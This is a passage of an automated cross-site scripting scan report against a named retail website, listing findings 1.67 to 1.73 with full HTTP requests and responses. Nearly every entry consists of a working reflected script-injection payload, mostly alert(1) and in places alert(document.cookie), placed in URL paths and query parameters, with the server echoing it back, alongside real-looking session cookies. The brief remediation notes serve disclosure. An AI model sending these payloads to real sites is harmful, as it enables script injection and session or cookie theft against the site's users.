...[SNIP]...
order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-
Connection: Keep-Alive
REDIRECT_UNIQUE_ID: 5A5r1KwSrSgAAGQksdcAAAAa
REDIRECT_SCRIPT_URL: /text/omniture/s_code.js907ac--><script>alert(1)</script>6515f40b254
REDIRECT_SCRIPT_URI: http://www.territoryahead.com/text/omniture/s_code.js907ac-->
...[SNIP]...

1.67. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 30035--><script>alert(1)</script>5f4600ac95a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account30035--><script>alert(1)</script>5f4600ac95a/login/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: http://www.territoryahead.com/favicon.ico91103--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2be08184f36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; s_cc=true; 90232094_clogin=l=1299090746&v=1&e=1299093001248; cmRS=&t1=1299091179656&t2=1299091191551&t3=1299091201246&t4=1299091176856&lti=1299091201245&ln=&hr=https%3A//www.territoryahead.com/account/login/loginmain.jsp&fti=&fn=searchForm%3A0%3BfooterJoinform%3A1%3B&ac=&fd=&uer=&fu=&pi=ERROR&ho=data.coremetrics.com/eluminate%3F&ci=90232094&ul=http%3A//www.territoryahead.com/favicon.ico91103--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E2be08184f36&rf=http%3A//burp/show/5&cjen=1; s_sq=mlTTAprod%3D%2526pid%253Dhttp%25253A//www.territoryahead.com/favicon.ico91103--%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Mar 2011 18:50:14 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 38597

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
kie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA
UNIQUE_ID: YiVLHKwSrSgAAB1Eii8AAAAO
SCRIPT_URL: /account30035--><script>alert(1)</script>5f4600ac95a/login/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account30035-->
...[SNIP]...

1.68. https://www.territoryahead.com/account/login/loginmain.jsp [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/account/login/loginmain.jsp

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload 94610--><script>alert(1)</script>df05338b2d8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /account/login94610--><script>alert(1)</script>df05338b2d8/loginmain.jsp HTTP/1.1
Host: www.territoryahead.com
Connection: keep-alive
Referer: http://www.territoryahead.com/favicon.ico91103--%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E2be08184f36
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: order=62379998; customer=92643931; mmlID=68408168; JSESSIONID=e04CpejaYhA-; cmTPSet=Y; CoreID6=82806333286612990907467&ci=90232094; PS_ALL=%23ps_catid%7EHome; s_cc=true; 90232094_clogin=l=1299090746&v=1&e=1299093001248; cmRS=&t1=1299091179656&t2=1299091191551&t3=1299091201246&t4=1299091176856&lti=1299091201245&ln=&hr=https%3A//www.territoryahead.com/account/login/loginmain.jsp&fti=&fn=searchForm%3A0%3BfooterJoinform%3A1%3B&ac=&fd=&uer=&fu=&pi=ERROR&ho=data.coremetrics.com/eluminate%3F&ci=90232094&ul=http%3A//www.territoryahead.com/favicon.ico91103--%253E%253Cscript%253Ealert%28document.cookie%29%253C/script%253E2be08184f36&rf=http%3A//burp/show/5&cjen=1; s_sq=mlTTAprod%3D%2526pid%253Dhttp%25253A//www.territoryahead.com/favicon.ico91103--%2525253E%2525253Cscript%2525253Ealert%252528document.cookie%252529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA

Response

HTTP/1.1 404 Not Found
Date: Wed, 02 Mar 2011 18:41:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Keep-Alive: timeout=2, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=UTF-8
Content-Length: 38597

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
2529%2525253C/script%2525253E2be08184f36%2526oid%253Dhttps%25253A//www.territoryahead.com/account/login/loginmain.jsp%2526ot%253DA
UNIQUE_ID: QYTkXKwSrRQAAG-4DT8AAAAE
SCRIPT_URL: /account/login94610--><script>alert(1)</script>df05338b2d8/loginmain.jsp
SCRIPT_URI: https://www.territoryahead.com/account/login94610-->
...[SNIP]...

1.69. https://www.territoryahead.com/templates/custservcontactus.jsp [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 143ec--><script>alert(1)</script>3bb93c8afddf317e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates143ec--><script>alert(1)</script>3bb93c8afddf317e4/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Cookie: order=62380172; customer=92643794; mmlID=68408300; JSESSIONID=aTtg_UkbQc6f
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Wed, 02 Mar 2011 18:51:07 GMT
Server: Apache
Cache-Control: no-cache
Pragma: No-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
gzip, deflate
Connection: Keep-Alive
UNIQUE_ID: ZUsW8qwSrSgAAB1KjhMAAAAP
nokeepalive: 1
ssl-unclean-shutdown: 1
downgrade-1.0: 1
force-response-1.0: 1
SCRIPT_URL: /templates143ec--><script>alert(1)</script>3bb93c8afddf317e4/custservcontactus.jsp
SCRIPT_URI: https://www.territoryahead.com/templates143ec-->
...[SNIP]...

1.70. https://www.territoryahead.com/templates/custservcontactus.jsp [itemID parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the itemID request parameter is copied into an HTML comment. The payload 84835--><script>alert(1)</script>2aae3027ec1de6e58 was submitted in the itemID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=23684835--><script>alert(1)</script>2aae3027ec1de6e58&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:50:53 GMT
Server: Apache
ETag: "AAAAS533mWw"
Last-Modified: Wed, 02 Mar 2011 18:39:47 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380355; Path=/; Expires=Wed, 16-Mar-2011 18:39:47 GMT
Set-Cookie: customer=92644100; Path=/; Expires=Thu, 28-Feb-2019 18:39:47 GMT
Set-Cookie: mmlID=68408630; Path=/; Expires=Thu, 28-Feb-2019 18:39:47 GMT
Set-Cookie: JSESSIONID=dwln09Wlx6w6; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
om/errorhandler.jsp?ruleID=8&ruleID=145&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=145&itemID=23684835--><script>alert(1)</script>2aae3027ec1de6e58&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: none
Parameters:
submit.y = 13
submit.y = 13
ruleID = 8
ruleID = 145

...[SNIP]...

1.71. https://www.territoryahead.com/templates/custservcontactus.jsp [itemType parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the itemType request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8dd3"><script>alert(1)</script>07f711dd67d483f2 was submitted in the itemType parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORYf8dd3"><script>alert(1)</script>07f711dd67d483f2&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:50:54 GMT
Server: Apache
ETag: "AAAAS533XVr"
Last-Modified: Wed, 02 Mar 2011 18:38:45 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380271; Path=/; Expires=Wed, 16-Mar-2011 18:38:45 GMT
Set-Cookie: customer=92644146; Path=/; Expires=Thu, 28-Feb-2019 18:38:45 GMT
Set-Cookie: mmlID=68408383; Path=/; Expires=Thu, 28-Feb-2019 18:38:45 GMT
Set-Cookie: JSESSIONID=cCdnbeGWFQtg; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORYf8dd3"><script>alert(1)</script>07f711dd67d483f2&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.72. https://www.territoryahead.com/templates/custservcontactus.jsp [path parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the path request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c5e5"><script>alert(1)</script>42b219da0455ce10c was submitted in the path parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2363c5e5"><script>alert(1)</script>42b219da0455ce10c&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Wed, 02 Mar 2011 18:41:47 GMT
Server: Apache
ETag: "AAAAS533kz8"
Last-Modified: Wed, 02 Mar 2011 18:39:40 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380183; Path=/; Expires=Wed, 16-Mar-2011 18:39:40 GMT
Set-Cookie: customer=92644206; Path=/; Expires=Thu, 28-Feb-2019 18:39:40 GMT
Set-Cookie: mmlID=68408712; Path=/; Expires=Thu, 28-Feb-2019 18:39:40 GMT
Set-Cookie: JSESSIONID=ans7iWspjaG-; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<met
...[SNIP]...
<form action="/templates/custservcontactus.jsp?ruleID=145&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C2363c5e5"><script>alert(1)</script>42b219da0455ce10c&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13" method="post" name="form1">
...[SNIP]...

1.73. https://www.territoryahead.com/templates/custservcontactus.jsp [ruleID parameter] previous

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.territoryahead.com
Path:	/templates/custservcontactus.jsp

Issue detail

The value of the ruleID request parameter is copied into an HTML comment. The payload 63790--><script>alert(1)</script>cb37172ac7cff2f60 was submitted in the ruleID parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /templates/custservcontactus.jsp?ruleID=14563790--><script>alert(1)</script>cb37172ac7cff2f60&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
Cache-Control: no-cache
Host: www.territoryahead.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Wed, 02 Mar 2011 18:41:43 GMT
Server: Apache
ETag: "AAAAS533WtZ"
Last-Modified: Wed, 02 Mar 2011 18:38:43 GMT
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Set-Cookie: order=62380270; Path=/; Expires=Wed, 16-Mar-2011 18:38:42 GMT
Set-Cookie: customer=92644145; Path=/; Expires=Thu, 28-Feb-2019 18:38:42 GMT
Set-Cookie: mmlID=68408382; Path=/; Expires=Thu, 28-Feb-2019 18:38:42 GMT
Set-Cookie: JSESSIONID=ckFN2dMN8sd8; Path=/
Connection: close
Content-Type: text/html;charset=UTF-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta name="ve
...[SNIP]...
ipt%3Ealert%281%29%3C%2Fscript%3Ecb37172ac7cff2f60&submit.y=13&Email=&itemID=1&Topic=&LName=&Message=&itemType=ErrorPage&path=1%2C2%2C195%2C236&submit.x=46&FName=&itemType=ErrorPage&itemID=1&ruleID=14563790--><script>alert(1)</script>cb37172ac7cff2f60&itemID=236&itemType=CATEGORY&path=1%2C2%2C195%2C236&FName=&LName=&Email=&Topic=&Message=&submit.x=46&submit.y=13
Session ID: none
Parameters:
submit.y = 13
submit.y = 13
ruleID = 8
rul
...[SNIP]...

Report generated by XSS.CX at Sat Mar 05 07:03:20 CST 2011.